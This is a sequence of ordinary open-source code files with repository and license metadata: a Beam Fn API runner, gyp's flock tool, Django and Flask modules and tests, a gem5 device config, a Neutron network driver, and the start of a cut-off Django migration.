beam_fn_api_pb2.Target.List()} side_inputs = {} else: # Read the source object from the runner. source_coder = beam.coders.DillCoder() input_transform_id = self._next_uid() output_stream = create_OutputStream() source_coder.get_impl().encode_to_stream( GlobalWindows.windowed_value(operation.source), output_stream, True) target_name = self._next_uid() input_data[(input_transform_id, target_name)] = output_stream.get() input_ptransform = beam_fn_api_pb2.PrimitiveTransform( id=input_transform_id, function_spec=beam_fn_api_pb2.FunctionSpec( urn=sdk_worker.DATA_INPUT_URN, id=self._next_uid()), # TODO(robertwb): Possible name collision. step_name=stage_name + '/inject_source', inputs={target_name: beam_fn_api_pb2.Target.List()}, outputs={ 'out': beam_fn_api_pb2.PCollection( coder_reference=coder_id(source_coder)) }) if data_operation_spec: input_ptransform.function_spec.data.Pack(data_operation_spec) transforms.append(input_ptransform) # Read the elements out of the source. fn = sdk_worker.pack_function_spec_data( OLDE_SOURCE_SPLITTABLE_DOFN_DATA, sdk_worker.PYTHON_DOFN_URN, id=self._next_uid()) inputs = { 'ignored_input_tag': beam_fn_api_pb2.Target.List(target=[ beam_fn_api_pb2.Target( primitive_transform_reference=input_transform_id, name='out') ]) } side_inputs = {} elif isinstance(operation, operation_specs.WorkerDoFn): fn = sdk_worker.pack_function_spec_data( operation.serialized_fn, sdk_worker.PYTHON_DOFN_URN, id=self._next_uid()) inputs = as_target(operation.input) # Store the contents of each side input for state access. for si in operation.side_inputs: assert isinstance(si.source, iobase.BoundedSource) element_coder = si.source.default_output_coder() view_id = self._next_uid() # TODO(robertwb): Actually flesh out the ViewFn API. side_inputs[si.tag] = beam_fn_api_pb2.SideInput( view_fn=sdk_worker.serialize_and_pack_py_fn( element_coder, urn=sdk_worker.PYTHON_ITERABLE_VIEWFN_URN, id=view_id)) # Re-encode the elements in the nested context and # concatenate them together output_stream = create_OutputStream() for element in si.source.read( si.source.get_range_tracker(None, None)): element_coder.get_impl().encode_to_stream( element, output_stream, True) elements_data = output_stream.get() state_key = beam_fn_api_pb2.StateKey(function_spec_reference=view_id) state_handler.Clear(state_key) state_handler.Append( beam_fn_api_pb2.SimpleStateAppendRequest( state_key=state_key, data=[elements_data])) elif isinstance(operation, operation_specs.WorkerFlatten): fn = sdk_worker.pack_function_spec_data( operation.serialized_fn, sdk_worker.IDENTITY_DOFN_URN, id=self._next_uid()) inputs = { 'ignored_input_tag': beam_fn_api_pb2.Target.List(target=[ beam_fn_api_pb2.Target( primitive_transform_reference=transform_index_to_id[ input_op_index], name=output_tags(map_task[input_op_index][1])[ input_output_index]) for input_op_index, input_output_index in operation.inputs ]) } side_inputs = {} else: raise TypeError(operation) ptransform = beam_fn_api_pb2.PrimitiveTransform( id=transform_id, function_spec=fn, step_name=stage_name, inputs=inputs, side_inputs=side_inputs, outputs=outputs(operation)) transforms.append(ptransform) process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor( id=self._next_uid(), coders=coders.values(), primitive_transform=transforms) return beam_fn_api_pb2.InstructionRequest( instruction_id=self._next_uid(), register=beam_fn_api_pb2.RegisterRequest( process_bundle_descriptor=[process_bundle_descriptor ])), runner_sinks, input_data def _run_map_task( self, map_task, control_handler, state_handler, data_plane_handler, data_operation_spec): registration, sinks, input_data = self._map_task_registration( map_task, state_handler, data_operation_spec) control_handler.push(registration) process_bundle = beam_fn_api_pb2.InstructionRequest( instruction_id=self._next_uid(), process_bundle=beam_fn_api_pb2.ProcessBundleRequest( process_bundle_descriptor_reference=registration.register. process_bundle_descriptor[0].id)) for (transform_id, name), elements in input_data.items(): data_out = data_plane_handler.output_stream( process_bundle.instruction_id, beam_fn_api_pb2.Target( primitive_transform_reference=transform_id, name=name)) data_out.write(elements) data_out.close() control_handler.push(process_bundle) while True: result = control_handler.pull() if result.instruction_id == process_bundle.instruction_id: if result.error: raise RuntimeError(result.error) expected_targets = [ beam_fn_api_pb2.Target(primitive_transform_reference=transform_id, name=output_name) for (transform_id, output_name), _ in sinks.items()] for output in data_plane_handler.input_elements( process_bundle.instruction_id, expected_targets): target_tuple = ( output.target.primitive_transform_reference, output.target.name) if target_tuple not in sinks: # Unconsumed output. continue sink_op = sinks[target_tuple] coder = sink_op.output_coders[0] input_stream = create_InputStream(output.data) elements = [] while input_stream.size() > 0: elements.append(coder.get_impl().decode_from_stream( input_stream, True)) if not sink_op.write_windowed_values: elements = [e.value for e in elements] for e in elements: sink_op.output_buffer.append(e) return def execute_map_tasks(self, ordered_map_tasks, direct=True): if direct: controller = FnApiRunner.DirectController() else: controller = FnApiRunner.GrpcController() try: for _, map_task in ordered_map_tasks: logging.info('Running %s', map_task) self._run_map_task( map_task, controller.control_handler, controller.state_handler, controller.data_plane_handler, controller.data_operation_spec()) finally: controller.close() class SimpleState(object): # TODO(robertwb): Inherit from GRPC servicer. def __init__(self): self._all = collections.defaultdict(list) def Get(self, state_key): return beam_fn_api_pb2.Elements.Data( data=''.join(self._all[self._to_key(state_key)])) def Append(self, append_request): self._all[self._to_key(append_request.state_key)].extend( append_request.data) def Clear(self, state_key): try: del self._all[self._to_key(state_key)] except KeyError: pass @staticmethod def _to_key(state_key): return (state_key.function_spec_reference, state_key.window, state_key.key) class DirectController(object): """An in-memory controller for fn API control, state and data planes.""" def __init__(self): self._responses = [] self.state_handler = FnApiRunner.SimpleState() self.control_handler = self self.data_plane_handler = data_plane.InMemoryDataChannel() self.worker = sdk_worker.SdkWorker( self.state_handler, data_plane.InMemoryDataChannelFactory( self.data_plane_handler.inverse())) def push(self, request): logging.info('CONTROL REQUEST %s', request) response = self.worker.do_instruction(request) logging.info('CONTROL RESPONSE %s', response) self._responses.append(response) def pull(self): return self._responses.pop(0) def done(self): pass def close(self): pass def data_operation_spec(self): return None class GrpcController(object): """An grpc based controller for fn API control, state and data planes.""" def __init__(self): self.state_handler = FnApiRunner.SimpleState() self.control_server = grpc.server( futures.ThreadPoolExecutor(max_workers=10)) self.control_port = self.control_server.add_insecure_port('[::]:0') self.data_server = grpc.server(futures.ThreadPoolExecutor(max_workers=10)) self.data_port = self.data_server.add_insecure_port('[::]:0') self.control_handler = streaming_rpc_handler( beam_fn_api_pb2.BeamFnControlServicer, 'Control') beam_fn_api_pb2.add_BeamFnControlServicer_to_server( self.control_handler, self.control_server) self.data_plane_handler = data_plane.GrpcServerDataChannel() beam_fn_api_pb2.add_BeamFnDataServicer_to_server( self.data_plane_handler, self.data_server) logging.info('starting control server on port %s', self.control_port) logging.info('starting data server on port %s', self.data_port) self.data_server.start() self.control_server.start() self.worker = sdk_worker.SdkHarness( grpc.insecure_channel('localhost:%s' % self.control_port)) self.worker_thread = threading.Thread(target=self.worker.run) logging.info('starting worker') self.worker_thread.start() def data_operation_spec(self): url = 'localhost:%s' % self.data_port remote_grpc_port = beam_fn_api_pb2.RemoteGrpcPort() remote_grpc_port.api_service_descriptor.url = url return remote_grpc_port def close(self): self.control_handler.done() self.worker_thread.join() self.data_plane_handler.close() self.control_server.stop(5).wait() self.data_server.stop(5).wait()
apache-2.0
nicolieolieart/nicolieolieart.github.io
node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/flock_tool.py
1835
1748
#!/usr/bin/env python # Copyright (c) 2011 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """These functions are executed via gyp-flock-tool when using the Makefile generator. Used on systems that don't have a built-in flock.""" import fcntl import os import struct import subprocess import sys def main(args): executor = FlockTool() executor.Dispatch(args) class FlockTool(object): """This class emulates the 'flock' command.""" def Dispatch(self, args): """Dispatches a string command to a method.""" if len(args) < 1: raise Exception("Not enough arguments") method = "Exec%s" % self._CommandifyName(args[0]) getattr(self, method)(*args[1:]) def _CommandifyName(self, name_string): """Transforms a tool name like copy-info-plist to CopyInfoPlist""" return name_string.title().replace('-', '') def ExecFlock(self, lockfile, *cmd_list): """Emulates the most basic behavior of Linux's flock(1).""" # Rely on exception handling to report errors. # Note that the stock python on SunOS has a bug # where fcntl.flock(fd, LOCK_EX) always fails # with EBADF, that's why we use this F_SETLK # hack instead. fd = os.open(lockfile, os.O_WRONLY|os.O_NOCTTY|os.O_CREAT, 0666) if sys.platform.startswith('aix'): # Python on AIX is compiled with LARGEFILE support, which changes the # struct size. op = struct.pack('hhIllqq', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0) else: op = struct.pack('hhllhhl', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0) fcntl.fcntl(fd, fcntl.F_SETLK, op) return subprocess.call(cmd_list) if __name__ == '__main__': sys.exit(main(sys.argv[1:]))
mit
levigross/pyscanner
mytests/django/contrib/auth/management/commands/changepassword.py
97
1881
import getpass from optparse import make_option from django.core.management.base import BaseCommand, CommandError from django.contrib.auth.models import User from django.db import DEFAULT_DB_ALIAS class Command(BaseCommand): option_list = BaseCommand.option_list + ( make_option('--database', action='store', dest='database', default=DEFAULT_DB_ALIAS, help='Specifies the database to use. Default is "default".'), ) help = "Change a user's password for django.contrib.auth." requires_model_validation = False def _get_pass(self, prompt="Password: "): p = getpass.getpass(prompt=prompt) if not p: raise CommandError("aborted") return p def handle(self, *args, **options): if len(args) > 1: raise CommandError("need exactly one or zero arguments for username") if args: username, = args else: username = getpass.getuser() try: u = User.objects.using(options.get('database')).get(username=username) except User.DoesNotExist: raise CommandError("user '%s' does not exist" % username) self.stdout.write("Changing password for user '%s'\n" % u.username) MAX_TRIES = 3 count = 0 p1, p2 = 1, 2 # To make them initially mismatch. while p1 != p2 and count < MAX_TRIES: p1 = self._get_pass() p2 = self._get_pass("Password (again): ") if p1 != p2: self.stdout.write("Passwords do not match. Please try again.\n") count = count + 1 if count == MAX_TRIES: raise CommandError("Aborting password change for user '%s' after %s attempts" % (username, count)) u.set_password(p1) u.save() return "Password changed successfully for user '%s'" % u.username
mit
arju88nair/projectCulminate
venv/lib/python3.5/site-packages/flask/globals.py
322
1645
# -*- coding: utf-8 -*- """ flask.globals ~~~~~~~~~~~~~ Defines all the global objects that are proxies to the current active context. :copyright: (c) 2015 by Armin Ronacher. :license: BSD, see LICENSE for more details. """ from functools import partial from werkzeug.local import LocalStack, LocalProxy _request_ctx_err_msg = '''\ Working outside of request context. This typically means that you attempted to use functionality that needed an active HTTP request. Consult the documentation on testing for information about how to avoid this problem.\ ''' _app_ctx_err_msg = '''\ Working outside of application context. This typically means that you attempted to use functionality that needed to interface with the current application object in a way. To solve this set up an application context with app.app_context(). See the documentation for more information.\ ''' def _lookup_req_object(name): top = _request_ctx_stack.top if top is None: raise RuntimeError(_request_ctx_err_msg) return getattr(top, name) def _lookup_app_object(name): top = _app_ctx_stack.top if top is None: raise RuntimeError(_app_ctx_err_msg) return getattr(top, name) def _find_app(): top = _app_ctx_stack.top if top is None: raise RuntimeError(_app_ctx_err_msg) return top.app # context locals _request_ctx_stack = LocalStack() _app_ctx_stack = LocalStack() current_app = LocalProxy(_find_app) request = LocalProxy(partial(_lookup_req_object, 'request')) session = LocalProxy(partial(_lookup_req_object, 'session')) g = LocalProxy(partial(_lookup_app_object, 'g'))
apache-2.0
BorisJeremic/Real-ESSI-Examples
valgrind_test/test_cases/8NodeBrick/cantilever_different_Poisson/NumberOfDivision4/PoissonRatio0.49/compare_txt.py
202
2092
#!/usr/bin/python import h5py import sys import numpy as np import os import re import random # find the path to my own python function: cur_dir=os.getcwd() sep='test_cases' test_DIR=cur_dir.split(sep,1)[0] scriptDIR=test_DIR+'compare_function' sys.path.append(scriptDIR) # import my own function for color and comparator from mycomparator import * from mycolor_fun import * # analytic_solution = sys.argv[1] # numeric_result = sys.argv[2] analytic_solution = 'analytic_solution.txt' numeric_result = 'numeric_result.txt' analytic_sol = np.loadtxt(analytic_solution) numeric_res = np.loadtxt(numeric_result) abs_error = abs(analytic_sol - numeric_res) rel_error = abs_error/analytic_sol analytic_sol = float(analytic_sol) numeric_res = float(numeric_res) rel_error = float(rel_error) # print the results case_flag=1 print headrun() , "-----------Testing results-----------------" print headstep() ,'{0} {1} {2} '.format('analytic_solution ','numeric_result ','error ') print headOK() ,'{0:+e} {1:+e} {2:+0.2f} '.format(analytic_sol, numeric_res, rel_error ) if(case_flag==1): print headOKCASE(),"-----------Done this case!-----------------" # legacy backup # find . -name 'element.fei' -exec bash -c 'mv $0 ${0/element.fei/add_element.include}' {} \; # find . -name 'constraint.fei' -exec bash -c 'mv $0 ${0/constraint.fei/add_constraint.include}' {} \; # find . -name 'node.fei' -exec bash -c 'mv $0 ${0/node.fei/add_node.include}' {} \; # find . -name 'add_node.fei' -exec bash -c 'mv $0 ${0/add_node.fei/add_node.include}' {} \; # find . -name 'elementLT.fei' -exec bash -c 'mv $0 ${0/elementLT.fei/add_elementLT.include}' {} \; # sed -i "s/node\.fei/add_node.include/" main.fei # sed -i "s/add_node\.fei/add_node.include/" main.fei # sed -i "s/element\.fei/add_element.include/" main.fei # sed -i "s/elementLT\.fei/add_elementLT.include/" main.fei # sed -i "s/constraint\.fei/add_constraint.include/" main.fei # find . -name '*_bak.h5.feioutput' -exec bash -c 'mv $0 ${0/\_bak.h5.feioutput/\_original\.h5.feioutput}' {} \;
cc0-1.0
Leila20/django
tests/files/tests.py
16
12423
# -*- coding: utf-8 -*- from __future__ import unicode_literals import gzip import os import struct import tempfile import unittest from io import BytesIO, StringIO, TextIOWrapper from django.core.files import File from django.core.files.base import ContentFile from django.core.files.move import file_move_safe from django.core.files.temp import NamedTemporaryFile from django.core.files.uploadedfile import SimpleUploadedFile, UploadedFile from django.test import mock from django.utils import six from django.utils._os import upath try: from PIL import Image except ImportError: Image = None else: from django.core.files import images class FileTests(unittest.TestCase): def test_unicode_uploadedfile_name(self): uf = UploadedFile(name='¿Cómo?', content_type='text') self.assertIs(type(repr(uf)), str) def test_unicode_file_name(self): f = File(None, 'djángö') self.assertIs(type(repr(f)), str) def test_context_manager(self): orig_file = tempfile.TemporaryFile() base_file = File(orig_file) with base_file as f: self.assertIs(base_file, f) self.assertFalse(f.closed) self.assertTrue(f.closed) self.assertTrue(orig_file.closed) def test_namedtemporaryfile_closes(self): """ The symbol django.core.files.NamedTemporaryFile is assigned as a different class on different operating systems. In any case, the result should minimally mock some of the API of tempfile.NamedTemporaryFile from the Python standard library. """ tempfile = NamedTemporaryFile() self.assertTrue(hasattr(tempfile, "closed")) self.assertFalse(tempfile.closed) tempfile.close() self.assertTrue(tempfile.closed) def test_file_mode(self): # Should not set mode to None if it is not present. # See #14681, stdlib gzip module crashes if mode is set to None file = SimpleUploadedFile("mode_test.txt", b"content") self.assertFalse(hasattr(file, 'mode')) gzip.GzipFile(fileobj=file) def test_file_iteration(self): """ File objects should yield lines when iterated over. Refs #22107. """ file = File(BytesIO(b'one\ntwo\nthree')) self.assertEqual(list(file), [b'one\n', b'two\n', b'three']) def test_file_iteration_windows_newlines(self): """ #8149 - File objects with \r\n line endings should yield lines when iterated over. """ f = File(BytesIO(b'one\r\ntwo\r\nthree')) self.assertEqual(list(f), [b'one\r\n', b'two\r\n', b'three']) def test_file_iteration_mac_newlines(self): """ #8149 - File objects with \r line endings should yield lines when iterated over. """ f = File(BytesIO(b'one\rtwo\rthree')) self.assertEqual(list(f), [b'one\r', b'two\r', b'three']) def test_file_iteration_mixed_newlines(self): f = File(BytesIO(b'one\rtwo\nthree\r\nfour')) self.assertEqual(list(f), [b'one\r', b'two\n', b'three\r\n', b'four']) def test_file_iteration_with_unix_newline_at_chunk_boundary(self): f = File(BytesIO(b'one\ntwo\nthree')) # Set chunk size to create a boundary after \n: # b'one\n... # ^ f.DEFAULT_CHUNK_SIZE = 4 self.assertEqual(list(f), [b'one\n', b'two\n', b'three']) def test_file_iteration_with_windows_newline_at_chunk_boundary(self): f = File(BytesIO(b'one\r\ntwo\r\nthree')) # Set chunk size to create a boundary between \r and \n: # b'one\r\n... # ^ f.DEFAULT_CHUNK_SIZE = 4 self.assertEqual(list(f), [b'one\r\n', b'two\r\n', b'three']) def test_file_iteration_with_mac_newline_at_chunk_boundary(self): f = File(BytesIO(b'one\rtwo\rthree')) # Set chunk size to create a boundary after \r: # b'one\r... # ^ f.DEFAULT_CHUNK_SIZE = 4 self.assertEqual(list(f), [b'one\r', b'two\r', b'three']) def test_file_iteration_with_text(self): f = File(StringIO('one\ntwo\nthree')) self.assertEqual(list(f), ['one\n', 'two\n', 'three']) def test_readable(self): with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file: self.assertTrue(test_file.readable()) self.assertFalse(test_file.readable()) def test_writable(self): with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file: self.assertTrue(test_file.writable()) self.assertFalse(test_file.writable()) with tempfile.TemporaryFile('rb') as temp, File(temp, name='something.txt') as test_file: self.assertFalse(test_file.writable()) def test_seekable(self): with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file: self.assertTrue(test_file.seekable()) self.assertFalse(test_file.seekable()) def test_io_wrapper(self): content = "vive l'été\n" with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file: test_file.write(content.encode('utf-8')) test_file.seek(0) wrapper = TextIOWrapper(test_file, 'utf-8', newline='\n') self.assertEqual(wrapper.read(), content) # The following seek() call is required on Windows Python 2 when # switching from reading to writing. wrapper.seek(0, 2) wrapper.write(content) wrapper.seek(0) self.assertEqual(wrapper.read(), content * 2) test_file = wrapper.detach() test_file.seek(0) self.assertEqual(test_file.read(), (content * 2).encode('utf-8')) class NoNameFileTestCase(unittest.TestCase): """ Other examples of unnamed files may be tempfile.SpooledTemporaryFile or urllib.urlopen() """ def test_noname_file_default_name(self): self.assertIsNone(File(BytesIO(b'A file with no name')).name) def test_noname_file_get_size(self): self.assertEqual(File(BytesIO(b'A file with no name')).size, 19) class ContentFileTestCase(unittest.TestCase): def test_content_file_default_name(self): self.assertIsNone(ContentFile(b"content").name) def test_content_file_custom_name(self): """ Test that the constructor of ContentFile accepts 'name' (#16590). """ name = "I can have a name too!" self.assertEqual(ContentFile(b"content", name=name).name, name) def test_content_file_input_type(self): """ Test that ContentFile can accept both bytes and unicode and that the retrieved content is of the same type. """ self.assertIsInstance(ContentFile(b"content").read(), bytes) if six.PY3: self.assertIsInstance(ContentFile("español").read(), six.text_type) else: self.assertIsInstance(ContentFile("español").read(), bytes) class DimensionClosingBug(unittest.TestCase): """ Test that get_image_dimensions() properly closes files (#8817) """ @unittest.skipUnless(Image, "Pillow not installed") def test_not_closing_of_files(self): """ Open files passed into get_image_dimensions() should stay opened. """ empty_io = BytesIO() try: images.get_image_dimensions(empty_io) finally: self.assertTrue(not empty_io.closed) @unittest.skipUnless(Image, "Pillow not installed") def test_closing_of_filenames(self): """ get_image_dimensions() called with a filename should closed the file. """ # We need to inject a modified open() builtin into the images module # that checks if the file was closed properly if the function is # called with a filename instead of an file object. # get_image_dimensions will call our catching_open instead of the # regular builtin one. class FileWrapper(object): _closed = [] def __init__(self, f): self.f = f def __getattr__(self, name): return getattr(self.f, name) def close(self): self._closed.append(True) self.f.close() def catching_open(*args): return FileWrapper(open(*args)) images.open = catching_open try: images.get_image_dimensions(os.path.join(os.path.dirname(upath(__file__)), "test1.png")) finally: del images.open self.assertTrue(FileWrapper._closed) class InconsistentGetImageDimensionsBug(unittest.TestCase): """ Test that get_image_dimensions() works properly after various calls using a file handler (#11158) """ @unittest.skipUnless(Image, "Pillow not installed") def test_multiple_calls(self): """ Multiple calls of get_image_dimensions() should return the same size. """ img_path = os.path.join(os.path.dirname(upath(__file__)), "test.png") with open(img_path, 'rb') as fh: image = images.ImageFile(fh) image_pil = Image.open(fh) size_1 = images.get_image_dimensions(image) size_2 = images.get_image_dimensions(image) self.assertEqual(image_pil.size, size_1) self.assertEqual(size_1, size_2) @unittest.skipUnless(Image, "Pillow not installed") def test_bug_19457(self): """ Regression test for #19457 get_image_dimensions fails on some pngs, while Image.size is working good on them """ img_path = os.path.join(os.path.dirname(upath(__file__)), "magic.png") size = images.get_image_dimensions(img_path) with open(img_path, 'rb') as fh: self.assertEqual(size, Image.open(fh).size) @unittest.skipUnless(Image, "Pillow not installed") class GetImageDimensionsTests(unittest.TestCase): def test_invalid_image(self): """ get_image_dimensions() should return (None, None) for the dimensions of invalid images (#24441). brokenimg.png is not a valid image and it has been generated by: $ echo "123" > brokenimg.png """ img_path = os.path.join(os.path.dirname(upath(__file__)), "brokenimg.png") with open(img_path, 'rb') as fh: size = images.get_image_dimensions(fh) self.assertEqual(size, (None, None)) def test_valid_image(self): """ get_image_dimensions() should catch struct.error while feeding the PIL Image parser (#24544). Emulates the Parser feed error. Since the error is raised on every feed attempt, the resulting image size should be invalid: (None, None). """ img_path = os.path.join(os.path.dirname(upath(__file__)), "test.png") with mock.patch('PIL.ImageFile.Parser.feed', side_effect=struct.error): with open(img_path, 'rb') as fh: size = images.get_image_dimensions(fh) self.assertEqual(size, (None, None)) class FileMoveSafeTests(unittest.TestCase): def test_file_move_overwrite(self): handle_a, self.file_a = tempfile.mkstemp() handle_b, self.file_b = tempfile.mkstemp() # file_move_safe should raise an IOError exception if destination file exists and allow_overwrite is False with self.assertRaises(IOError): file_move_safe(self.file_a, self.file_b, allow_overwrite=False) # should allow it and continue on if allow_overwrite is True self.assertIsNone(file_move_safe(self.file_a, self.file_b, allow_overwrite=True)) os.close(handle_a) os.close(handle_b) class SpooledTempTests(unittest.TestCase): def test_in_memory_spooled_temp(self): with tempfile.SpooledTemporaryFile() as temp: temp.write(b"foo bar baz quux\n") django_file = File(temp, name="something.txt") self.assertEqual(django_file.size, 17) def test_written_spooled_temp(self): with tempfile.SpooledTemporaryFile(max_size=4) as temp: temp.write(b"foo bar baz quux\n") django_file = File(temp, name="something.txt") self.assertEqual(django_file.size, 17)
bsd-3-clause
MrLoick/python-for-android
python3-alpha/python3-src/Lib/encodings/gb18030.py
816
1031
# # gb18030.py: Python Unicode Codec for GB18030 # # Written by Hye-Shik Chang <perky@FreeBSD.org> # import _codecs_cn, codecs import _multibytecodec as mbc codec = _codecs_cn.getcodec('gb18030') class Codec(codecs.Codec): encode = codec.encode decode = codec.decode class IncrementalEncoder(mbc.MultibyteIncrementalEncoder, codecs.IncrementalEncoder): codec = codec class IncrementalDecoder(mbc.MultibyteIncrementalDecoder, codecs.IncrementalDecoder): codec = codec class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader): codec = codec class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter): codec = codec def getregentry(): return codecs.CodecInfo( name='gb18030', encode=Codec().encode, decode=Codec().decode, incrementalencoder=IncrementalEncoder, incrementaldecoder=IncrementalDecoder, streamreader=StreamReader, streamwriter=StreamWriter, )
apache-2.0
nilmini20s/gem5-2016-08-13
src/dev/arm/UFSHostDevice.py
38
3533
# Copyright (c) 2013-2015 ARM Limited # All rights reserved. # # The license below extends only to copyright in the software and shall # not be construed as granting a license to any other intellectual # property including but not limited to intellectual property relating # to a hardware implementation of the functionality of the software # licensed hereunder. You may use the software subject to the license # terms below provided that you ensure that this notice is replicated # unmodified and in its entirety in all distributions of the software, # modified or unmodified, in source code or in binary form. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer; # redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution; # neither the name of the copyright holders nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # Authors: Rene de Jong # import sys from m5.params import * from m5.proxy import * from Device import DmaDevice from AbstractNVM import * class UFSHostDevice(DmaDevice): type = 'UFSHostDevice' cxx_header = "dev/arm/ufs_device.hh" pio_addr = Param.Addr("Address for SCSI configuration slave interface") pio_latency = Param.Latency("10ns", "Time between action and write/read \ result by AMBA DMA Device") gic = Param.BaseGic(Parent.any, "Gic to use for interrupting") int_num = Param.UInt32("Interrupt number that connects to GIC") img_blk_size = Param.UInt32(512, "Size of one image block in bytes") # Every image that is added to the vector will generate a new logic unit # in the UFS device; Theoretically (when using the driver from Linux # kernel 3.9 onwards), this can be as many as eigth. Up to two have been # tested. image = VectorParam.DiskImage("Disk images") # Every logic unit can have its own flash dimensions. So the number of # images that have been provided in the image vector, should be equal to # the number of flash objects that are created. Each logic unit can have # its own flash dimensions; to allow the system to define a hetrogeneous # storage system. internalflash = VectorParam.AbstractNVM("Describes the internal flash") ufs_slots = Param.UInt32(32, "Number of commands that can be queued in \ the Host controller (min: 1, max: 32)")
bsd-3-clause
shakamunyi/neutron-vrrp
neutron/plugins/ml2/drivers/type_flat.py
13
5104
# Copyright (c) 2013 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo.config import cfg from oslo.db import exception as db_exc import sqlalchemy as sa from neutron.common import exceptions as exc from neutron.db import model_base from neutron.openstack.common import log from neutron.plugins.common import constants as p_const from neutron.plugins.ml2 import driver_api as api LOG = log.getLogger(__name__) flat_opts = [ cfg.ListOpt('flat_networks', default=[], help=_("List of physical_network names with which flat " "networks can be created. Use * to allow flat " "networks with arbitrary physical_network names.")) ] cfg.CONF.register_opts(flat_opts, "ml2_type_flat") class FlatAllocation(model_base.BASEV2): """Represent persistent allocation state of a physical network. If a record exists for a physical network, then that physical network has been allocated as a flat network. """ __tablename__ = 'ml2_flat_allocations' physical_network = sa.Column(sa.String(64), nullable=False, primary_key=True) class FlatTypeDriver(api.TypeDriver): """Manage state for flat networks with ML2. The FlatTypeDriver implements the 'flat' network_type. Flat network segments provide connectivity between VMs and other devices using any connected IEEE 802.1D conformant physical_network, without the use of VLAN tags, tunneling, or other segmentation mechanisms. Therefore at most one flat network segment can exist on each available physical_network. """ def __init__(self): self._parse_networks(cfg.CONF.ml2_type_flat.flat_networks) def _parse_networks(self, entries): self.flat_networks = entries if '*' in self.flat_networks: LOG.info(_("Arbitrary flat physical_network names allowed")) self.flat_networks = None elif not all(self.flat_networks): msg = _("physical network name is empty") raise exc.InvalidInput(error_message=msg) else: LOG.info(_("Allowable flat physical_network names: %s"), self.flat_networks) def get_type(self): return p_const.TYPE_FLAT def initialize(self): LOG.info(_("ML2 FlatTypeDriver initialization complete")) def is_partial_segment(self, segment): return False def validate_provider_segment(self, segment): physical_network = segment.get(api.PHYSICAL_NETWORK) if not physical_network: msg = _("physical_network required for flat provider network") raise exc.InvalidInput(error_message=msg) if self.flat_networks and physical_network not in self.flat_networks: msg = (_("physical_network '%s' unknown for flat provider network") % physical_network) raise exc.InvalidInput(error_message=msg) for key, value in segment.iteritems(): if value and key not in [api.NETWORK_TYPE, api.PHYSICAL_NETWORK]: msg = _("%s prohibited for flat provider network") % key raise exc.InvalidInput(error_message=msg) def reserve_provider_segment(self, session, segment): physical_network = segment[api.PHYSICAL_NETWORK] with session.begin(subtransactions=True): try: LOG.debug(_("Reserving flat network on physical " "network %s"), physical_network) alloc = FlatAllocation(physical_network=physical_network) alloc.save(session) except db_exc.DBDuplicateEntry: raise exc.FlatNetworkInUse( physical_network=physical_network) return segment def allocate_tenant_segment(self, session): # Tenant flat networks are not supported. return def release_segment(self, session, segment): physical_network = segment[api.PHYSICAL_NETWORK] with session.begin(subtransactions=True): count = (session.query(FlatAllocation). filter_by(physical_network=physical_network). delete()) if count: LOG.debug("Releasing flat network on physical network %s", physical_network) else: LOG.warning(_("No flat network found on physical network %s"), physical_network)
apache-2.0
allo-/django-bingo
bingo/migrations/0006_add_newword.py
1
2231
# -*- coding: utf-8 -*- from django.db import migrations, models import django.db.models.deletion def split_words(apps, schema_editor): Word = apps.get_model("bingo", "Word") BingoField = apps.get_model("bingo", "BingoField") NewWord = apps.get_model("bingo", "NewWord") Site = apps.get_model("sites", "Site") for word in Word.objects.all(): for site in Site.objects.all(): fields = BingoField.objects.filter(word=word, board__game__site=site) if site in word.site.all(): new_word = NewWord(word=word.word, description=word.description, type=word.type, site=site) new_word.save() fields.update(new_word=new_word) elif fields.count() > 0: new_word = NewWord(word=word.word, description=word.description, type=word.type, site=site, enabled=False) new_word.save() fields.update(new_word=new_word) class Migration(migrations.Migration): dependencies = [ ('sites', '0002_alter_domain_unique'), ('bingo', '0005_changed_rating_and_vote'), ] operations = [ migrations.CreateModel( name='NewWord', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('word', models.CharField(max_length=255)), ('description', models.CharField(blank=True, max_length=255)), ('type', models.PositiveSmallIntegerField(choices=[(1, 